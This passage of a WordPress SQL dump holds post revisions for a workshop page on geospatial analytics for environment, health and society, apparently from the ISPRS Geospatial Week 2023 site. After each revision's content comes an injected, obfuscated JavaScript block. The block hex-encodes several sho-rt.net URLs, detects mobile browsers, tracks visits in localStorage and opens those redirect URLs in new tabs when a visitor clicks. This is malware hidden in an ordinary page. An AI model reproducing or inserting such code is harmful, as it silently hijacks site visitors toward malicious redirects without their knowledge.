Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>GEOSPATIAL DATA ANALYTICS FOR PHYSICAL GEOGRAPHY IMPACT ASSESSMENT ON ENVIRONMENT, HEALTH AND SOCIETY</strong>','','inherit','closed','closed','','3427-revision-v1','','','2023-01-14 01:41:44','2023-01-14 01:41:44','',3427,'https://gsw2023.com/?p=3544',0,'revision','',0),
(3545,1,'2023-01-14 01:42:09','2023-01-14 01:42:09','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3446\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5>Geospatial data, in general, and Remote sensing data offers a detailed perspective on systems and locations that can be precious for applications ranging from natural resources management, environmental management, and weather observations to public health and disaster management. The World Meteorological Organization (WMO) released the executive action plan of early warning for all at the round table meeting on November 7, 2022. Early warning systems are imperative to adjusting to climate change adaptation and reducing disaster risk. Climate change poses a big threat to population health due to the increased risk of the spread of disease, natural disasters and air pollution, among many other things.  In terms of analysis of cause-and-effect relationships, it is established that Environmental pollutants can cause health problems like respiratory diseases, heart disease, and some types of cancer. Environmental Factors that Can impact health include chemical pollution, water pollution, air pollution, climate change, disease-causing microbes, lack of access to health care, and poor infrastructure. The entire mankind is at risk of health starting from the level of pollution <em>to psychological problems</em><em>. </em></h5>\n<h5>Geography doesn\'t just determine whether humans can live in a certain area; it also determines people\'s lifestyles as they adapt to the available food and climate patterns.​ <em>In this context, spatial distribution of social variations is emerging at a fast rate, and a study on Social geography is of immediate need by which qualitative and quantitative assessment of the social relations, identities and inequalities could be facilitated as part of attaining the 17 UN sustainable development goals. </em></h5>\n<h5><em> </em></h5>\n<h5><em>The unanswered question is “How is physical geography influencing social geography”. It is understood of late that s</em>ocial geography is being influenced significantly by physical geography, pinpointing that both the physical and social environment are potential contributors to the state of environment and Health. That is why the 2015 Lancet Commission on Health and Climate Change has been formed to map out the impacts of climate change and the necessary policy responses to ensure the highest attainable health standards for populations worldwide. The major concerns of the relevant and immediate societal issues are prescribed as the themes of this workshop which are given below</h5>\n<h5></h5>\n<h5><strong>The workshop on “<u>Geospatial data analytics for physical geography impact on the environment, health and society”</u>  </strong>will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with several related geospatial workshops. The event will be held as a two-day single-track workshop of oral presentations and poster sessions in the context of the ISPRS Geospatial Week by WG III/9 on Geospatial environment and health analytics jointly with WG III/6 and ICWG III/IVa. <em>Application of Geospatial Technology, Geospatial data analytics to Environment, Health and Disaster Management addressing various concerns related to societal geography form the essential themes to be discussed during the workshop.  </em></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"80px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"62\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong><u>Themes of the Workshop</u></strong></h5>\n<table width=\"588\">\n<tbody>\n<tr>\n<td width=\"270\"><em><strong>Air pollution</strong></em></td>\n<td width=\"318\"><em><strong>Aerosols and AOD</strong></em></td>\n</tr>\n<tr>\n<td width=\"270\"><em><strong>Air /water quality</strong></em></td>\n<td width=\"318\"><em><strong>Vegetation</strong></em></td>\n</tr>\n<tr>\n<td width=\"270\"><em><strong>Disaster management</strong></em></td>\n<td width=\"318\"><em><strong>Land use changes and dynamics</strong></em></td>\n</tr>\n<tr>\n<td width=\"270\"><em><strong>Land degradation</strong></em></td>\n<td width=\"318\"><em><strong>Epidemiology and Disease mapping</strong></em></td>\n</tr>\n<tr>\n<td width=\"270\"><em><strong>GeoAI and Health analytics</strong></em></td>\n<td width=\"318\"><em><strong>Geospatial applications to Environment</strong></em></td>\n</tr>\n</tbody>\n</table>\n<p><em>Research papers are invited with focus on application of <strong>Geospatial technogies including <u>Remote Sensing</u></strong> to the following  broad themes</em></p>\n<p>&nbsp;</p>\n<p>The main concern is related to methods of extraction of the information from remote sensing images and remote sensing image sequences for application to understand pertinent environmental and socio-cultural issues related to the earth, environment and people.  <strong>Given below I to vi are the 6 grand challenges formulated so as to invite the potential  authors  to bring out their research results as a very specific outcome of the workshop to the maximum possible extent.  </strong></p>\n<ol>\n<li><em>Environment and health are dependent on geographical variations, So understanding how physical geography is influencing social geography</em> by using tools of geospatial technology is essential for effective management of environment. In general, we consider  remote sensing data due its variety, veracity, volume and velocity  is effective tool for addressing the unique challenges. These data are being made available for analysis from traditional systems such as high-resolution imaging sensors as well as innovative sources like mobile location data, social media, sensors from Internet-of-Things devices and crowdsourcing. So this is one challenge thrown to potential authors to address in their presentation.</li>\n</ol>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<ol>\n<li>Next challenge to be addressed by authors is on explanation related tp how much do the vegetation, climate, water cycle, and land formations which are all defined as physical geography, affect the society?  People interact with their physical environment through the air they breathe, the water they drink, the houses they live in, and the transportation they access to travel to work and school.</li>\n</ol>\n<ul>\n<li>The third one is on how can we create indicators derived from satellite data for assessing land use changes, urbanization, air and water quality and land degradation? They have an influence on natural resources management as well as the occurrence of various diseases, vector borne diseases, pulmonary diseases, food and waterborne diseases or non-communicable diseases.</li>\n</ul>\n<ol>\n<li>What is the current geospatial research for environmental management, air, water pollution and land degradation mapping, disease mapping, Health services, and geospatial epidemiology that could be operationalized through possible pivoting and scaling for appropriate interventions by the authorities?</li>\n<li>The fifth challenge is about Remote sensing application to assessment of air quality and air pollution, atmospheric aerosols, atmospheric composition, and evaluating its synergism with other data sets, including constraining greenhouse gases evolution and exchange processes</li>\n<li>Disaster management is a great challenge and state-of-the-art Geospatial and GeoAI techniques application is emerging as a powerful tool. Here authors may address the challenges related to Geospatial Infrastructure Management Ecosystem (GeoIME), cloud-web-application including AI tools, early warning systems, monitoring, preparedness, data analytics, and algorithms for human detection from earth observations and UAVs/MAVs images etc.</li>\n</ol>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5><u>Supporting ISPRS Working Groups:</u></h5>\n<ul>\n<li>The workshop is proposed by WG III/ 9 Geospatial Environment and Health Analytics</li>\n<li>WG III/6 on Remote sensing of the Atmosphere and ICWG III/IVa on Disaster Management</li>\n</ul>\n<p>are the supporting working groups.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5><u>Scientific Committee:</u></h5>\n<ul>\n<li>Peng Yue, Wuhan University, PR China</li>\n<li><strong> Weilian Li, </strong>University of Bonn, Germany</li>\n<li>Dr Suchita Gopal, Boston University. USA</li>\n<li>Dr Mahbooba Nasreen, University of Dacca, Bangladesh</li>\n<li>Dr Fazlay Faruq, University of Mississippi USA</li>\n<li>Dr Murthy Remella, Indian Space Research Organization, India</li>\n<li>Dr Nitin Kumar Tripathi, Asian institute of Technology, Thailand</li>\n<li><strong>Dr Nelly Lucero Ramírez Serrato, </strong>National Autonomous University of Mexico, Mexico</li>\n<li>Dr Valli Manickam, Administrative Staff College of India, India</li>\n</ul>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5><u><strong>Special Issue dedicated to the workshop:</strong> </u></h5>\n<p>The authors of selected papers will be invited to submit extended versions of their papers to the –Journal of Photogrammetry, Remote Sensing and Geoinformation Science. The papers can be reviewed as per the current practices of ISPRS. (<a href=\"https://www.springer.com/journal/41064\">https://www.springer.com/journal/41064)</a>.[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>GEOSPATIAL DATA ANALYTICS FOR PHYSICAL GEOGRAPHY IMPACT ASSESSMENT ON ENVIRONMENT, HEALTH AND SOCIETY</strong>','','inherit','closed','closed','','3427-revision-v1','','','2023-01-14 01:42:09','2023-01-14 01:42:09','',3427,'https://gsw2023.com/?p=3545',0,'revision','',0),
(3546,1,'2023-01-14 01:45:13','2023-01-14 01:45:13','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3446\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5>Geospatial data, in general, and Remote sensing data offers a detailed perspective on systems and locations that can be precious for applications ranging from natural resources management, environmental management, and weather observations to public health and disaster management. The World Meteorological Organization (WMO) released the executive action plan of early warning for all at the round table meeting on November 7, 2022. Early warning systems are imperative to adjusting to climate change adaptation and reducing disaster risk. Climate change poses a big threat to population health due to the increased risk of the spread of disease, natural disasters and air pollution, among many other things.  In terms of analysis of cause-and-effect relationships, it is established that Environmental pollutants can cause health problems like respiratory diseases, heart disease, and some types of cancer. Environmental Factors that Can impact health include chemical pollution, water pollution, air pollution, climate change, disease-causing microbes, lack of access to health care, and poor infrastructure. The entire mankind is at risk of health starting from the level of pollution <em>to psychological problems</em><em>. </em></h5>\n<h5>Geography doesn\'t just determine whether humans can live in a certain area; it also determines people\'s lifestyles as they adapt to the available food and climate patterns.​ <em>In this context, spatial distribution of social variations is emerging at a fast rate, and a study on Social geography is of immediate need by which qualitative and quantitative assessment of the social relations, identities and inequalities could be facilitated as part of attaining the 17 UN sustainable development goals. </em></h5>\n<h5><em> </em></h5>\n<h5><em>The unanswered question is “How is physical geography influencing social geography”. It is understood of late that s</em>ocial geography is being influenced significantly by physical geography, pinpointing that both the physical and social environment are potential contributors to the state of environment and Health. That is why the 2015 Lancet Commission on Health and Climate Change has been formed to map out the impacts of climate change and the necessary policy responses to ensure the highest attainable health standards for populations worldwide. The major concerns of the relevant and immediate societal issues are prescribed as the themes of this workshop which are given below</h5>\n<h5></h5>\n<h5><strong>The workshop on “<u>Geospatial data analytics for physical geography impact on the environment, health and society”</u>  </strong>will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with several related geospatial workshops. The event will be held as a two-day single-track workshop of oral presentations and poster sessions in the context of the ISPRS Geospatial Week by WG III/9 on Geospatial environment and health analytics jointly with WG III/6 and ICWG III/IVa. <em>Application of Geospatial Technology, Geospatial data analytics to Environment, Health and Disaster Management addressing various concerns related to societal geography form the essential themes to be discussed during the workshop.  </em></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"80px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"62\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong><u>Themes of the Workshop</u></strong></h5>\n<table width=\"588\">\n<tbody>\n<tr>\n<td width=\"270\"><em><strong>Air pollution</strong></em></td>\n<td width=\"318\"><em><strong>Aerosols and AOD</strong></em></td>\n</tr>\n<tr>\n<td width=\"270\"><em><strong>Air /water quality</strong></em></td>\n<td width=\"318\"><em><strong>Vegetation</strong></em></td>\n</tr>\n<tr>\n<td width=\"270\"><em><strong>Disaster management</strong></em></td>\n<td width=\"318\"><em><strong>Land use changes and dynamics</strong></em></td>\n</tr>\n<tr>\n<td width=\"270\"><em><strong>Land degradation</strong></em></td>\n<td width=\"318\"><em><strong>Epidemiology and Disease mapping</strong></em></td>\n</tr>\n<tr>\n<td width=\"270\"><em><strong>GeoAI and Health analytics</strong></em></td>\n<td width=\"318\"><em><strong>Geospatial applications to Environment</strong></em></td>\n</tr>\n</tbody>\n</table>\n<p><em>Research papers are invited with focus on application of <strong>Geospatial technogies including <u>Remote Sensing</u></strong> to the following  broad themes</em></p>\n<p>&nbsp;</p>\n<p>The main concern is related to methods of extraction of the information from remote sensing images and remote sensing image sequences for application to understand pertinent environmental and socio-cultural issues related to the earth, environment and people.</p>\n<h5><strong>Given below I to vi are the 6 grand challenges formulated so as to invite the potential  authors  to bring out their research results as a very specific outcome of the workshop to the maximum possible extent.  </strong></h5>\n<ul>\n<li>Environment and health are dependent on geographical variations, So understanding how physical geography is influencing social geography by using tools of geospatial technology is essential for effective management of environment. In general, we consider  remote sensing data due its variety, veracity, volume and velocity  is effective tool for addressing the unique challenges. These data are being made available for analysis from traditional systems such as high-resolution imaging sensors as well as innovative sources like mobile location data, social media, sensors from Internet-of-Things devices and crowdsourcing. So this is one challenge thrown to potential authors to address in their presentation.</li>\n</ul>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<ul>\n<li>Next challenge to be addressed by authors is on explanation related tp how much do the vegetation, climate, water cycle, and land formations which are all defined as physical geography, affect the society?  People interact with their physical environment through the air they breathe, the water they drink, the houses they live in, and the transportation they access to travel to work and school.</li>\n</ul>\n<p>&nbsp;</p>\n<ul>\n<li>The third one is on how can we create indicators derived from satellite data for assessing land use changes, urbanization, air and water quality and land degradation? They have an influence on natural resources management as well as the occurrence of various diseases, vector borne diseases, pulmonary diseases, food and waterborne diseases or non-communicable diseases.</li>\n</ul>\n<p>&nbsp;</p>\n<ul>\n<li>What is the current geospatial research for environmental management, air, water pollution and land degradation mapping, disease mapping, Health services, and geospatial epidemiology that could be operationalized through possible pivoting and scaling for appropriate interventions by the authorities?</li>\n<li>The fifth challenge is about Remote sensing application to assessment of air quality and air pollution, atmospheric aerosols, atmospheric composition, and evaluating its synergism with other data sets, including constraining greenhouse gases evolution and exchange processes</li>\n</ul>\n<p>&nbsp;</p>\n<ul>\n<li>Disaster management is a great challenge and state-of-the-art Geospatial and GeoAI techniques application is emerging as a powerful tool. Here authors may address the challenges related to Geospatial Infrastructure Management Ecosystem (GeoIME), cloud-web-application including AI tools, early warning systems, monitoring, preparedness, data analytics, and algorithms for human detection from earth observations and UAVs/MAVs images etc.</li>\n</ul>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5><u>Supporting ISPRS Working Groups:</u></h5>\n<ul>\n<li>The workshop is proposed by WG III/ 9 Geospatial Environment and Health Analytics</li>\n<li>WG III/6 on Remote sensing of the Atmosphere and ICWG III/IVa on Disaster Management</li>\n</ul>\n<p>are the supporting working groups.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5><u>Scientific Committee:</u></h5>\n<ul>\n<li>Peng Yue, Wuhan University, PR China</li>\n<li><strong> Weilian Li, </strong>University of Bonn, Germany</li>\n<li>Dr Suchita Gopal, Boston University. USA</li>\n<li>Dr Mahbooba Nasreen, University of Dacca, Bangladesh</li>\n<li>Dr Fazlay Faruq, University of Mississippi USA</li>\n<li>Dr Murthy Remella, Indian Space Research Organization, India</li>\n<li>Dr Nitin Kumar Tripathi, Asian institute of Technology, Thailand</li>\n<li><strong>Dr Nelly Lucero Ramírez Serrato, </strong>National Autonomous University of Mexico, Mexico</li>\n<li>Dr Valli Manickam, Administrative Staff College of India, India</li>\n</ul>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5><u><strong>Special Issue dedicated to the workshop:</strong> </u></h5>\n<p>The authors of selected papers will be invited to submit extended versions of their papers to the –Journal of Photogrammetry, Remote Sensing and Geoinformation Science. The papers can be reviewed as per the current practices of ISPRS. (<a href=\"https://www.springer.com/journal/41064\">https://www.springer.com/journal/41064)</a>.[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return 